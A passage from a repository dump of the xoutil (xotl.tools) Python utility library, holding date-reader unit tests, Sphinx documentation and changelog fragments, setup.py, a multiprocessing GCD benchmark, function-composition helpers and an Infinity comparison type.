nullable=False, strict=False\n )\n\n inst = rec([\"201-12-17\"])\n self.assertEqual(inst.moment, datetime(201, 12, 17))\n\n @patch(\"dateutil.parser.parse\", None)\n def test_relaxed_but_nonnullable_without_dateutil(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(\n FMT, nullable=False, strict=False\n )\n\n inst = rec([\"201-12-17\"])\n with self.assertRaises(ValueError):\n self.assertIsNone(inst.moment)\n\n @patch(\"dateutil.parser.parse\", None)\n def test_relax_with_default(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(FMT, default=0, strict=False)\n\n inst = rec([\"201-12-17\"])\n self.assertEqual(inst.moment, 0)\n\n\nclass TestDateReader(unittest.TestCase):\n def setUp(self):\n # clear lru caches for each test... Needed so that imports done inside\n # date_reader are mockable.\n date_reader.cache_clear()\n datetime_reader.cache_clear()\n\n def test_date_reader_nullable(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, nullable=True)\n\n inst = rec({\"date\": \"2015-01-01\"})\n self.assertEqual(inst.when, date(2015, 1, 1))\n\n inst = rec({})\n self.assertIsNone(inst.when)\n\n inst = rec({\"date\": \"201-01-01\"})\n with self.assertRaises(ValueError):\n inst.when\n\n def test_date_reader_relaxed_with_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n self.assertEqual(inst.when, date(201, 1, 1))\n\n @patch(\"dateutil.parser.parse\", None)\n def test_date_reader_relaxed_nullable_no_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, nullable=True, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n self.assertIsNone(inst.when)\n\n @patch(\"dateutil.parser.parse\", None)\n def test_date_reader_relaxed_no_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n with self.assertRaises(ValueError):\n self.assertIsNone(inst.when)\n" }, { "alpha_fraction": 0.5050301551818848, "alphanum_fraction": 0.5070422291755676, "avg_line_length": 30.0625, "blob_id": "43d2b69b6bcc8be448366d769ed83c552c996a93", "content_id": "c4db56e22472e99483122545b6c638241562c568", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 497, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/dim/meta.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "======================================================================\n `xotl.tools.dim.meta`:mod: -- Meta-definitions for concrete numbers.\n======================================================================\n\n.. automodule:: xotl.tools.dim.meta\n :members: Dimension, Signature, Quantity, Scalar\n\n.. data:: UNIT\n\n This the constant value ``1``. It's given this name to emphasize it's the\n canonical unit for a dimension.\n\n\n.. data:: SCALAR\n\n The signature of dimensionless quantities.\n" }, { "alpha_fraction": 0.49065420031547546, "alphanum_fraction": 0.49065420031547546, "avg_line_length": 52.5, "blob_id": "34a152208c0b83d68b280e5ee12d1248ba8b27e0", "content_id": "3a78a8e08ccd5333932563184e20465f4df9ea08", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 428, "license_type": "permissive", "max_line_length": 77, "num_lines": 8, "path": "/docs/source/xotl.tools/future/contextlib.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=============================================================================\n `xotl.tools.future.contextlib`:mod: - Utilities for with-statement contexts\n=============================================================================\n\n.. automodule:: xotl.tools.future.contextlib\n\nThe main reason to use this module is to stop using the ``nested()`` function\nand use the `ExitStack <contextlib.ExitStack>`:class: implementation.\n" }, { "alpha_fraction": 0.7547169923782349, "alphanum_fraction": 0.7547169923782349, "avg_line_length": 52, "blob_id": "90abef439ab95f2446c2f4c64546e183158a8142", "content_id": "6cf21be6469b7d32e199e0f23eee35bbe3a439aa", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 53, "license_type": "permissive", "max_line_length": 52, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Make `xotl.tools.infinity.Infinity`:obj: pickable.\n" }, { "alpha_fraction": 0.606072723865509, "alphanum_fraction": 0.6152616739273071, "avg_line_length": 26.505495071411133, "blob_id": "2d5a19c51f2ce66df1198aa6c1c7b7ef87d56cd7", "content_id": "cd4b72838b6a0412484390b6924f51776e8a3bfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 76, "num_lines": 91, "path": "/setup.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# flake8: noqa\nimport os\nimport sys\nimport versioneer\n\nfrom setuptools import setup, find_packages\n\ntry:\n execfile\nexcept NameError:\n\n def execfile(filename):\n \"To run in Python 3\"\n import builtins\n\n exec_ = getattr(builtins, \"exec\")\n with open(filename, \"rb\") as f:\n code = compile(f.read().decode(\"utf-8\"), filename, \"exec\")\n return exec_(code, globals())\n\n\n# Import the version from the release module\nproject_name = \"xotl.tools\"\n_current_dir = os.path.dirname(os.path.abspath(__file__))\ndev_classifier = \"Development Status :: 5 - Production/Stable\"\n\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\n\n_cmdclass = {\"test\": PyTest}\n_cmdclass.update(versioneer.get_cmdclass())\n\n\nsetup(\n name=project_name,\n version=versioneer.get_version(),\n description=(\n \"Collection of usefull algorithms and other very \" \"disparate stuff\"\n ),\n long_description=open(os.path.join(_current_dir, \"README.rst\")).read(),\n classifiers=[\n # Get from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n dev_classifier,\n \"Intended Audience :: Developers\",\n (\n \"License :: OSI Approved :: \"\n \"GNU General Public License v3 or later (GPLv3+)\"\n ),\n \"Operating System :: POSIX :: Linux\", # This is where we are\n # testing. Don't promise\n # anything else.\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=\"\",\n author=\"Merchise Autrement\",\n author_email=\"[email protected]\",\n url=\"https://github.com/merchise/xoutil/\",\n license=\"GPLv3+\",\n tests_require=[\"pytest\"],\n namespace_packages=[\"xotl\"],\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n python_requires=\">=3.4\",\n install_requires=[\n 'monotonic; python_version<\"3.3\"',\n 'contextlib2; python_version<\"3.4\"',\n 'typing; python_version<\"3.5\"',\n ],\n extras_require={\n \"recommended\": [\"python-dateutil\", 'enum34; python_version<\"3.4\"']\n },\n cmdclass=_cmdclass,\n)\n" }, { "alpha_fraction": 0.7438016533851624, "alphanum_fraction": 0.7438016533851624, "avg_line_length": 47.400001525878906, "blob_id": "1d21c1b86e6922ba6ab972f07f72b71ed58b177c", "content_id": "c7f05b8ba21b34563cd945dfedc283c8c80d0260", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 242, "license_type": "permissive", "max_line_length": 75, "num_lines": 5, "path": "/docs/source/history/_changes-1.5.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added functions `xoutil.objects.dict_merge`:func:,\n `xoutil.types.are_instances`:func: and `xoutil.types.no_instances`:func:.\n\n- Deprecated function `xoutil.objects.smart_getattr`:func:. Use\n `xoutil.objects.get_first_of`:func: instead.\n" }, { "alpha_fraction": 0.5394548177719116, "alphanum_fraction": 0.5571497082710266, "avg_line_length": 23.89285659790039, "blob_id": "cf5b8dfb57abbc7b8c2d047f08ce397f1bbe2e04", "content_id": "cc7f039adf3fddb8d92fb639a12a9a96abc57d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2092, "license_type": "no_license", "max_line_length": 87, "num_lines": 84, "path": "/xotl/tools/benchmark/mp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2013-2017 Merchise Autrement [~º/~] and Contributors\n# Copyright (c) 2012 Manuel Vazquez\n\nfrom multiprocessing import Pool, cpu_count\nfrom itertools import count, islice, repeat\n\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\n\ndef gcd(a, b):\n while a % b != 0:\n a, b = b, a % b\n return b\n\n\ndef job(args):\n which, show = args\n try:\n result = gcd(which, which + 2 ** 37 - 73)\n if show and result != 1:\n print(which, result)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n from datetime import datetime\n import argparse\n\n cpus = max(cpu_count() - 1, 1)\n parser = argparse.ArgumentParser(\n \"Run several workers calculating GCD \"\n \"for large numbers. Uses multiprocessing \"\n \"to test several CPUs.\"\n )\n parser.add_argument(\n \"--show\",\n help=\"Whether to print or not the gcds\",\n action=\"store_true\",\n dest=\"show\",\n default=False,\n )\n parser.add_argument(\n \"--workers\",\n help=\"Number of workers. Defaults to %d.\" % cpus,\n type=int,\n action=\"store\",\n dest=\"workers\",\n default=cpus,\n )\n parser.add_argument(\n \"--size\",\n help=\"The magnitude of the test. Represents how many \"\n \"cycles are processed, exactly 10**MAGNITUDE; \"\n \"so be nice!\",\n type=int,\n action=\"store\",\n dest=\"magnitude\",\n default=6,\n )\n args = parser.parse_args()\n\n pool = Pool(processes=args.workers)\n start = datetime.now()\n try:\n print(\"Working...\")\n pool.imap(\n job,\n zip(islice(count(2 ** 1028 + 1), 10 ** args.magnitude), repeat(args.show)),\n chunksize=1024,\n )\n pool.close()\n pool.join()\n except KeyboardInterrupt:\n pool.terminate()\n pool.join()\n end = datetime.now()\n total_seconds = (end - start).total_seconds()\n print(\"All workers (%d) finished in %f seconds\" % (args.workers, total_seconds))\n" }, { "alpha_fraction": 0.6799409985542297, "alphanum_fraction": 0.6799409985542297, "avg_line_length": 36.66666793823242, "blob_id": "128df49dce2abe3666ebfed695d04ad2873e2934", "content_id": "67d9f867fcf8c4adffef8b32093f1444d31f6b1d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 678, "license_type": "permissive", "max_line_length": 78, "num_lines": 18, "path": "/docs/source/history/_changes-1.8.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add module `xoutil.future.csv`:mod:.\n\n- Add module `xoutil.future.mimetypes`:mod:.\n\n- Add module `xoutil.eight.urllib`:mod:.\n\n- The module ``xoutil.iterators`` is now officially named\n `xoutil.future.itertools`:mod:. The alias ``xoutil.iterators`` remains as a\n deprecated alias.\n\n- Add `xoutil.future.itertools.merge`:func:.\n\n- Add `xoutil.future.types._get_mro_attr`:func: function.\n\n- Deprecate in `xoutil.future.types`:mod: module: ``mro_dict`` class; and the\n functions ``mro_get_value_list``, ``mro_get_full_mapping``, ``is_iterable``,\n ``is_collection``, ``is_mapping``, ``is_string_like``, ``is_scalar``,\n ``is_module``, ``are_instances``, and ``no_instances``.\n" }, { "alpha_fraction": 0.7428571581840515, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 51.5, "blob_id": "9db02fc5e45a246e2437642c66f6a14c07df4269", "content_id": "4bb89802828133f7b6196ae504a6dcd76a5ea192", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 105, "license_type": "permissive", "max_line_length": 76, "num_lines": 2, "path": "/docs/source/history/_changes-2.1.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `xotl.tools.future.itertools.first_n`:func: in favor of stdlib's\n `itertools.islice`:func:.\n" }, { "alpha_fraction": 0.5368036031723022, "alphanum_fraction": 0.5402602553367615, "avg_line_length": 28.2738094329834, "blob_id": "74fb257c64974a3a85672960a784842a59ea6d5a", "content_id": "0a27a42aec3794aa248458d0a8118728d7e6cd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9838, "license_type": "no_license", "max_line_length": 78, "num_lines": 336, "path": "/xotl/tools/fp/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for working with functions in a more \"pure\" way.\n\n\"\"\"\n\nfrom abc import ABCMeta\n\n\ndef identity(arg):\n \"\"\"Returns its argument unaltered.\"\"\"\n return arg\n\n\ndef constant(value):\n \"Return a function that always return a constant `value`.\"\n\n def result(*args, **kwargs):\n return value\n\n return result\n\n\ndef fst(pair, strict=True):\n \"\"\"Return the first element of `pair`.\n\n If `strict` is True, `pair` needs to unpack to exactly two values. If\n `strict` is False this is the same as ``pair[0]``.\n\n .. note:: This is an idiomatic function intended for using in compositions\n or as the argument or high-level functions. Don't use it in your code\n as a replacement of ``x[0]``.\n\n .. versionadded:: 1.8.5\n\n \"\"\"\n if strict:\n res, _ = pair\n return res\n else:\n return pair[0]\n\n\ndef snd(pair, strict=True):\n \"\"\"Return the second element of `pair`.\n\n If `strict` is True, `pair` needs to unpack to exactly two values. If\n `strict` is False this is the same as ``pair[1]``.\n\n .. note:: This is an idiomatic function intended for using in compositions\n or as the argument or high-level functions. Don't use it in your code\n as a replacement of ``x[1]``.\n\n .. versionadded:: 1.8.5\n\n \"\"\"\n if strict:\n _, res = pair\n return res\n else:\n return pair[1]\n\n\nclass MetaCompose(ABCMeta):\n\n \"\"\"Meta-class for function composition.\"\"\"\n\n def __instancecheck__(self, instance):\n \"\"\"Override for ``isinstance(instance, self)``.\"\"\"\n res = super().__instancecheck__(instance)\n if not res:\n # TODO: maybe only those with parameters.\n res = callable(instance)\n return res\n\n def __subclasscheck__(self, subclass):\n \"\"\"Override for ``issubclass(subclass, self)``.\"\"\"\n res = super().__subclasscheck__(subclass)\n if not res:\n from xotl.tools.future.types import FuncTypes\n\n res = subclass in FuncTypes\n return res\n\n\nclass compose(metaclass=MetaCompose):\n r\"\"\"Composition of several functions.\n\n Functions are composed right to left. A composition of zero functions\n gives back the `identity`:func: function.\n\n The following rules (the arguments of `all`) are always true::\n\n >>> x = 15\n >>> f, g, h = x.__add__, x.__mul__, x.__xor__\n >>> all((compose() is identity,\n ...\n ... # identity functions are optimized\n ... compose(identity, f, identity) is f,\n ...\n ... compose(f) is f,\n ... compose(g, f)(x) == g(f(x)),\n ... compose(h, g, f)(x) == h(g(f(x)))))\n True\n\n If any \"intermediate\" function returns an instance of:\n\n - `pos_args`:class:\\ : it's expanded as variable positional arguments to\n the next function.\n\n - `kw_args`:class:\\ : it's expanded as variable keyword arguments to the\n next function.\n\n - `full_args`:class:\\ : it's expanded as variable positional and keyword\n arguments to the next function.\n\n The expected usage of these is **not** to have function return those types\n directly, but to use them when composing functions that return tuples and\n expect tuples.\n\n \"\"\"\n # TODO: __slots__ = ('inner', 'scope')\n\n def __new__(cls, *functions):\n functions = [fn for fn in functions if fn is not identity]\n count = len(functions)\n if count == 0:\n return identity\n else:\n if all(callable(f) for f in functions):\n if count == 1:\n return functions[0]\n else:\n from xotl.tools.symbols import Unset\n\n self = super().__new__(cls)\n self.inner = functions\n self.scope = Unset\n return self\n else:\n raise TypeError(\"at least one argument is not callable\")\n\n def __call__(self, *args, **kwds):\n funcs = self.inner\n count = len(funcs)\n if count:\n i = 1\n res = full_args((args, kwds))\n while i <= count:\n try:\n fn = funcs[-i]\n if isinstance(res, pos_args):\n res = fn(*res)\n elif isinstance(res, kw_args):\n res = fn(**res)\n elif isinstance(res, full_args):\n res = fn(*res[0], **res[1])\n else:\n res = fn(res)\n except Exception:\n # TODO: @med What's the point of of resetting scope under\n # exception? Should this `try..` even be?\n self.scope = (count - i, fn)\n raise\n i += 1\n return res\n else:\n return identity(*args, **kwds)\n\n def __repr__(self):\n \"\"\"Get composed function representation\"\"\"\n from xotl.tools.tools import nameof\n\n if self.inner:\n\n def getname(fn):\n return nameof(fn).replace((lambda: None).__name__, \"λ\")\n\n return \" . \".join(getname(fn) for fn in self.inner)\n else:\n return nameof(identity)\n\n def __str__(self):\n \"\"\"Get composed function string\"\"\"\n count = len(self.inner)\n if count == 0:\n return identity.__doc__\n else:\n res = self.inner[0].__doc__ if count == 1 else None\n if not res:\n res = \"Composed function: <{!r}>\".format(self)\n return res\n\n def _get_name(self):\n res = self.__dict__.get(\"__name__\")\n if res is None:\n res = repr(self)\n return res\n\n def _set_name(self, value):\n self.__dict__[\"__name__\"] = value\n\n __name__ = property(_get_name, _set_name)\n\n def _get_doc(self):\n res = self.__dict__.get(\"__doc__\")\n if res is None:\n res = str(self)\n return res\n\n def _set_doc(self, value):\n self.__dict__[\"__doc__\"] = value\n\n __doc__ = property(_get_doc, _set_doc)\n\n def __eq__(self, other):\n if isinstance(type(other), MetaCompose):\n return self.inner == other.inner\n elif self.inner:\n return self.inner[0] == other\n else:\n return other is identity\n\n def __len__(self):\n return len(self.inner)\n\n def __iter__(self):\n return iter(self.inner)\n\n def __contains__(self, item):\n return item in self.inner\n\n def __getitem__(self, index):\n res = self.inner[index]\n return compose(*res) if isinstance(res, list) else res\n\n # TODO: Should we really allow compose be mutable?\n def __setitem__(self, index, value):\n if isinstance(index, slice) and isinstance(type(value), MetaCompose):\n value = value.inner\n self.inner[index] = value\n\n def __delitem__(self, index):\n del self.inner[index]\n\n\nclass pos_args(tuple):\n \"\"\"Mark variable number positional arguments (see `full_args`:class:).\"\"\"\n\n\nclass kw_args(dict):\n \"\"\"Mark variable number keyword arguments (see `full_args`:class:).\"\"\"\n\n\nclass full_args(tuple):\n \"\"\"Mark variable number arguments for composition.\n\n Pair containing positional and keyword ``(args, kwds)`` arguments.\n\n In standard functional composition, the result of a function is considered\n a single value to be use as the next function argument. You can override\n this behaviour returning one instance of `pos_args`:class:,\n `kw_args`:class:, or this class; in order to provide multiple arguments to\n the next call.\n\n Since types are callable, you may use it directly in `compose`:func:\n instead of changing your functions to returns the instance of one of these\n classes::\n\n >>> def join_args(*args):\n ... return ' -- '.join(str(arg) for arg in args)\n\n >>> compose(join_args, pos_args, list, range)(2)\n '0 -- 1'\n\n # Without 'pos_args', it prints the list\n >>> compose(join_args, list, range)(2)\n '[0, 1]'\n\n \"\"\"\n\n @staticmethod\n def parse(arg):\n \"\"\"Parse possible alternatives.\n\n If ``arg`` is:\n\n - a pair of a ``tuple`` and a ``dict``, return a `full_args`:class:\n instance.\n\n - a ``tuple`` or a ``list``, return a `pos_args`:class: instance;\n\n - a ``dict``, return a `kw_args`:class: instance;\n\n - ``None``, return an empty `pos_args`:class: instance.\n\n For example (remember that functions return 'None' when no explicit\n 'return' is issued)::\n\n >>> def join_args(*args):\n ... if args:\n ... return ' -- '.join(str(arg) for arg in args)\n\n >>> compose(join_args, full_args.parse, join_args)()\n None\n\n # Without 'full_args.parse', return 'str(None)'\n >>> compose(join_args, join_args)()\n 'None'\n\n \"\"\"\n if isinstance(arg, tuple):\n\n def check(pos, kw):\n return isinstance(pos, tuple) and isinstance(kw, dict)\n\n if len(arg) == 2 and check(*arg):\n return full_args(arg)\n else:\n return pos_args(arg)\n elif isinstance(arg, list):\n return pos_args(arg)\n elif isinstance(arg, dict):\n return kw_args(arg)\n elif arg is None:\n return pos_args()\n else:\n msg = \"Expecting None, a tuple, a list, or a dict; {} found\"\n raise TypeError(msg.format(type(arg).__name__))\n" }, { "alpha_fraction": 0.6517857313156128, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 31, "blob_id": "4f1d4e09c1f5f188b0d74189be34ba9885c52ed3", "content_id": "6e0657b8ac57cbe189fc1a21db907a9b329312ae", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 448, "license_type": "permissive", "max_line_length": 121, "num_lines": 14, "path": "/docs/source/xotl.tools/deprecation.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.deprecation`:mod: - Utils for marking deprecated elements\n=====================================================================\n\n.. automodule:: xotl.tools.deprecation\n\n.. autofunction:: deprecated(replacement, msg=None, deprecated_module=None, removed_in_version=None, check_version=False)\n\n.. autofunction:: deprecated_alias\n\n.. autofunction:: import_deprecated\n\n.. autofunction:: deprecate_module\n\n.. autofunction:: deprecate_linked\n" }, { "alpha_fraction": 0.6017851233482361, "alphanum_fraction": 0.6055612564086914, "avg_line_length": 27.009614944458008, "blob_id": "254346785c829087120698c27128e2a77f6e57ce", "content_id": "23914bf4924ccd70acaf06b8445bb1dd28b222bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2918, "license_type": "no_license", "max_line_length": 88, "num_lines": 104, "path": "/xotl/tools/infinity.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"The Infinity value.\n\nNot all values are comparable with `Infinity`:obj: by default. The ABC\n`InfinityComparable`:class: holds the registry of such values. Any `number\n<numbers.Number>`:class: is comparable with `Infinity`:obj:.\n\n`Dates <datetime.date>`:class:, `datetimes <datetime.datetime>`:class: and\n`time deltas <datetime.timedelta>`:class: are also registered by default.\n\n.. warning:: In Python 2, dates, datetimes and time deltas must be the right\n operand, as in ``Infinity > today``. Doing ``today < Infinity``\n fails in Python 2.\n\n\"\"\"\n\nimport abc\nimport datetime\nfrom numbers import Number\nfrom functools import total_ordering\n\n\nclass InfinityComparable(metaclass=abc.ABCMeta):\n \"\"\"Any type that can be sensibly compared to infinity.\n\n All types in the `number <numbers.Number>`:class: tower are *always*\n comparable.\n\n Classes `datetime.date`:class:, `datetime.datetime`:class:, and\n `datetime.timedelta`:class: are automatically registered.\n\n \"\"\"\n\n @classmethod\n def __subclasshook__(self, cls):\n if isinstance(cls, type) and issubclass(cls, Number):\n return True\n else:\n return NotImplemented\n\n\nInfinityComparable.register(datetime.date)\nInfinityComparable.register(datetime.datetime)\nInfinityComparable.register(datetime.timedelta)\n\n\n@total_ordering\nclass InfinityType:\n _positive = None\n _negative = None\n\n def __getnewargs__(self):\n return (self.sign,)\n\n def __new__(cls, sign):\n if sign < 0:\n res = cls._negative\n if not res:\n cls._negative = res = object.__new__(cls)\n else:\n res = cls._positive\n if not res:\n cls._positive = res = object.__new__(cls)\n return res\n\n def __init__(self, sign):\n self.sign = -1 if sign < 0 else 1\n\n def __lt__(self, other):\n if isinstance(other, InfinityComparable):\n return self.sign < 0 # True iff -Infinity\n elif isinstance(other, InfinityType):\n return self.sign < other.sign\n else:\n raise TypeError(\"Incomparable types: %r and %r\" % (type(self), type(other)))\n\n def __eq__(self, other):\n if isinstance(other, InfinityType):\n return self.sign == other.sign\n else:\n return NotImplemented\n\n def __neg__(self):\n return type(self)(-self.sign)\n\n def __str__(self):\n return \"∞\" if self.sign > 0 else \"-∞\"\n\n def __repr__(self):\n return \"Infinity\" if self.sign > 0 else \"-Infinity\"\n\n def __hash__(self):\n return id(self)\n\n\nInfinity = InfinityType(+1)\n" }, { "alpha_fraction": 0.6690455079078674, "alphanum_fraction": 0.6770740151405334, "avg_line_length": 22.851064682006836, "blob_id": "4629462fa1e6bb879673213e2a6ef77358af1c7e", "content_id": "25d0f834e6433f68db048c2c637a31192ae9b369", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1121, "license_type": "permissive", "max_line_length": 80, "num_lines": 47, "path": "/docs/source/xotl.tools/decorator.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.decorator`:mod: - Several decorators\n================================================\n\n.. module:: xotl.tools.decorator\n\nThis module contains several useful decorators, for several purposed. Also it\nsevers as a namespace for other well-defined types of decorators.\n\n.. warning:: This modules will be progressively deprecated during the 1.6\n series.\n\n We feel that either `xotl.tools.objects`:mod: or `xotl.tools.functools` are a\n better match for some of these decorators. But since we need to make sure\n about keeping dependencies, the deprecation won't be final until 1.7.0.\n After 1.8.0, this modules will be finally removed.\n\nTop-level decorators\n--------------------\n\n.. autoclass:: AttributeAlias\n :members:\n\n.. autofunction:: settle\n\n.. autofunction:: namer\n\n.. autofunction:: aliases\n\n.. autofunction:: assignment_operator(func, maybe_inline=False)\n\n.. autofunction:: instantiate(target, *args, **kwargs)\n\n.. autofunction:: constant_bagger(func, *args, **kwds)\n\n.. autoclass:: memoized_instancemethod\n\n\n\n\nSub packages\n------------\n\n.. toctree::\n :glob:\n :maxdepth: 1\n\n decorator/*\n" }, { "alpha_fraction": 0.7659574747085571, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 46, "blob_id": "adb9b65168e9a53a172c098177357551349fde9d", "content_id": "8eec18ce4456657ddec280fed1ad4743f5a5f249", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 47, "license_type": "permissive", "max_line_length": 46, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix packaging issue. No functional changes.\n" }, { "alpha_fraction": 0.6324856281280518, "alphanum_fraction": 0.6357670426368713, "avg_line_length": 28.0238094329834, "blob_id": "6cfef7e0edcde8fd181156c98a583b2da1703cb3", "content_id": "646031ad55ccb872935c892f2eb4886791b0ce98", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 78, "num_lines": 42, "path": "/docs/source/xotl.tools/fp/prove.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp.prove`:mod: - Prove validity of values\n=====================================================\n\nProving success or failure of a function call has two main patterns:\n\n1. Predicative: a function call returns one or more values indicating a\n failure, for example method ``find`` in strings returns ``-1`` if the\n sub-string is not found. In general this pattern considers a set of values\n as logical Boolean true, an other set false.\n\n Example::\n\n index = s.find('x')\n if index >= 0:\n ... # condition of success\n else:\n ... # condition of failure\n\n\n\n2. Disruptive: a function call throws an exception on a failure breaking the\n normal flow of execution, for example method ``index`` in strings.\n\n Example::\n\n try:\n index = s.index('x)\n except ValueError:\n ... # condition of failure\n else:\n ... # condition of success\n\n The exception object contains the semantics of the \"\"anomalous condition\".\n Exception handling can be used as flow control structures for execution\n context inter-layer processing, or as a termination condition.\n\n\nModule content\n--------------\n\n.. automodule:: xotl.tools.fp.prove\n :members:\n" }, { "alpha_fraction": 0.5541125535964966, "alphanum_fraction": 0.5541125535964966, "avg_line_length": 37.5, "blob_id": "7149b8f021aeff7ab301ec0e108c5f5202b67928", "content_id": "876ef20b09fca01d5ebbe8cbadcdfb89948b3897", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 231, "license_type": "permissive", "max_line_length": 73, "num_lines": 6, "path": "/docs/source/xotl.tools/fs/path.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fs.path`:mod: -- Path utilities\n===========================================\n\n.. automodule:: xotl.tools.fs.path\n :members: join, fix_encoding, normalize_path, shorten_module_filename,\n shorten_user, rtrim\n" }, { "alpha_fraction": 0.7051734328269958, "alphanum_fraction": 0.7104644179344177, "avg_line_length": 35.58064651489258, "blob_id": "35d56dede9ca9da1695ec5bdd1c5b90c1ea4d366", "content_id": "958c2a46087bd1b950cf5c426c4ee9c5d408fba2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3402, "license_type": "permissive", "max_line_length": 78, "num_lines": 93, "path": "/docs/source/history/_changes-1.8.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Remove deprecated `!xoutil.objects.metaclass`:class:, use\n `xoutil.eight.meta.metaclass`:func: instead.\n\n- Several modules are migrated to `xoutil.future`:mod:\\ :\n\n .. hlist::\n :columns: 3\n\n - `~xoutil.future.types`:mod:.\n - `~xoutil.future.collections`:mod:.\n - `~xoutil.future.datetime`:mod:.\n - `~xoutil.future.functools`:mod:.\n - `~xoutil.future.inspect`:mod:.\n - `~xoutil.future.codecs`:mod:.\n - `~xoutil.future.json`:mod:.\n - `~xoutil.future.threading`:mod:.\n - `~xoutil.future.subprocess`:mod:.\n - `~xoutil.future.pprint`:mod:.\n - `~xoutil.future.textwrap`:mod:.\n\n .. note:: All modules remain importable from its future-less version,\n however, deprecated.\n\n- Add function `xoutil.deprecation.import_deprecated`:func:,\n 